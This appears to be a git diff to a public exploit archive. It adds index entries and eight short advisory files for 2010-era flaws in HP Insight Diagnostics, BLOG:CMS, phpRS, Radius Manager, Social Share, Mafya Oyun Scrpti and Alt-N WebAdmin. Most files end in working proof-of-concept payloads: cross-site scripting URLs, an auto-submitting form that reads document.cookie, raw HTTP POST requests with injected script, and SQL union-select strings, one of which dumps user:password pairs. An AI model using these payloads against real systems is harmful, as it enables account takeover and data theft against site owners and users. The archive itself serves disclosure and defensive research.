diff --git a/files.csv b/files.csv
index 0d6bc16a2..5e498b1ff 100755
--- a/files.csv
+++ b/files.csv
@@ -31631,3 +31631,11 @@ id,file,description,date,author,platform,type,port
 35113,platforms/php/webapps/35113.php,"MAARCH 1.4 - Arbitrary File Upload",2014-10-29,"Adrien Thierry",php,webapps,80
 35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80
 35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,metasploit,linux,remote,631
+35116,platforms/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 'search.php' CVE-2010-4111 Cross Site Scripting Vulnerability",2010-12-15,"Richard Brain",php,webapps,0
+35117,platforms/php/webapps/35117.txt,"BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross Site Scripting Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0
+35118,platforms/php/webapps/35118.txt,"phpRS 'model-kits.php' SQL Injection Vulnerability",2010-12-16,KnocKout,php,webapps,0
+35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 Remote Source Code Information Disclosure Vulnerability",2010-12-17,wsn1983,windows,remote,0
+35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0
+35121,platforms/php/webapps/35121.txt,"Social Share Multiple Cross Site Scripting Vulnerabilities",2010-12-17,"Aliaksandr Hartsuyeu",php,webapps,0
+35122,platforms/php/webapps/35122.txt,"Social Share 'postid' Parameter SQL Injection Vulnerability",2010-12-20,"Aliaksandr Hartsuyeu",php,webapps,0
+35123,platforms/php/webapps/35123.txt,"Mafya Oyun Scrpti 'profil.php' SQL Injection Vulnerability",2010-12-20,"DeadLy DeMon",php,webapps,0
diff --git a/platforms/php/webapps/35116.txt b/platforms/php/webapps/35116.txt
new file mode 100755
index 000000000..be1346b41
--- /dev/null
+++ b/platforms/php/webapps/35116.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45420/info
+
+HP Insight Diagnostics Online Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to HP Insight Diagnostics Online Edition 8.5.1.3712 
+
+http://www.example.com/hpdiags/frontend2/help/search.php?query="onmouseover="alert(1); 
\ No newline at end of file
diff --git a/platforms/php/webapps/35117.txt b/platforms/php/webapps/35117.txt
new file mode 100755
index 000000000..5ec61aa3e
--- /dev/null
+++ b/platforms/php/webapps/35117.txt
@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/45432/info
+
+BLOG:CMS is prone to a cross-site-scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+BLOG:CMS 4.2.1.e is vulnerable; prior versions may also be affected. 
+
+Cross Site Scripting POCs:
+
+<form action="http://host/admin/index.php" method="post" name="main">
+<input type="hidden" name="blogid" value="0">
+<input type="hidden" name="itemid" value="0">
+<input type="hidden" name="action" value="browseowncomments">
+<input type="hidden" name="amount" value=&#039;10"><script>alert(document.cookie)</script>&#039;>
+<input type="hidden" name="start" value="0">
+<input type="hidden" name="search" value="">
+</form>
+<script>
+document.main.submit();
+</script>
+
+
+
+
+http://www.example.com/admin/index.php?action=settingsedit"><script>alert(document.cookie)</script>
+
diff --git a/platforms/php/webapps/35118.txt b/platforms/php/webapps/35118.txt
new file mode 100755
index 000000000..58c882506
--- /dev/null
+++ b/platforms/php/webapps/35118.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45467/info
+
+phpRS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/model-kits.php?akce=model&nazev=zis-3-1942-divisional-gun&id=-32/**/union/**/select/**/1,concat%28user,0x3a,password%29,3,4,5/**/from/**/mac_user-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/35120.txt b/platforms/php/webapps/35120.txt
new file mode 100755
index 000000000..d06def8df
--- /dev/null
+++ b/platforms/php/webapps/35120.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45481/info
+
+Radius Manager is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Radius Manager 3.6.0 is vulnerable; other versions may also be affected
+
+http:///admin.php?cont=update_usergroup&id=1 POST /admin.php?cont=update_usergroup&id=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=edit_usergroup&id=1 Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 120 name=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Update Request 2: http:///admin.php?cont=store_nas POST /admin.php?cont=store_nas HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http:///admin.php?cont=new_nas Cookie: PHPSESSID=fo1ba9oci06jjsqkqpvptftj43; login_admin=admin; online_ordercol=username; online_ordertype=ASC; listusers_ordercol=username; listusers_ordertype=DESC; listusers_lastorder=username Content-Type: application/x-www-form-urlencoded Content-Length: 112 name=Name&nasip=10.0.0.1&type=0&secret=1111&descr=%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&Submit=Add+NAS 
\ No newline at end of file
diff --git a/platforms/php/webapps/35121.txt b/platforms/php/webapps/35121.txt
new file mode 100755
index 000000000..5daefee6b
--- /dev/null
+++ b/platforms/php/webapps/35121.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45485/info
+
+Social Share is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/socialshare/save.php?title=<XSS>
+
+http://www.example.com/socialshare/save.php?url="><XSS>
\ No newline at end of file
diff --git a/platforms/php/webapps/35122.txt b/platforms/php/webapps/35122.txt
new file mode 100755
index 000000000..f476152bd
--- /dev/null
+++ b/platforms/php/webapps/35122.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45497/info
+
+Social Share is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/socialshare/postview.php? postid=-1 union select 1,2,3,4,5,6,7,8,9,10# 
\ No newline at end of file
diff --git a/platforms/php/webapps/35123.txt b/platforms/php/webapps/35123.txt
new file mode 100755
index 000000000..e939f6910
--- /dev/null
+++ b/platforms/php/webapps/35123.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45501/info
+
+Mafya Oyun Scrpti is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+http://www.example.com/profil.php?id=[SQL] 
\ No newline at end of file
diff --git a/platforms/windows/remote/35119.txt b/platforms/windows/remote/35119.txt
new file mode 100755
index 000000000..8b26a57b5
--- /dev/null
+++ b/platforms/windows/remote/35119.txt
@@ -0,0 +1,14 @@
+source: http://www.securityfocus.com/bid/45476/info
+
+Alt-N WebAdmin is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.
+
+The following versions are affected:
+
+Alt-N WebAdmin 3.3.3
+U-Mail 9.8 for Windows
+U-Mail GateWay 9.8 for Windows 
+
+http://www.example.com/login.wdm%20
+http://www.example.com/login.wdm%2e 
\ No newline at end of file